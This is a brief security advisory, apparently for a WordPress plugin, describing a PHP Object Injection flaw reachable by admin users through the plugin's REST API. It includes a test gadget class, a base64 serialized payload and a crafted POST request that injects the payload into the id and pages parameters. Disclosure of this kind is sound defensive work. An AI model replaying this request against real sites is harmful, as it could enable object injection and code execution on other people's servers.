The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Use the add account function, intercept it and add or replace the id or pages parameter to Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};):
POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1
{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}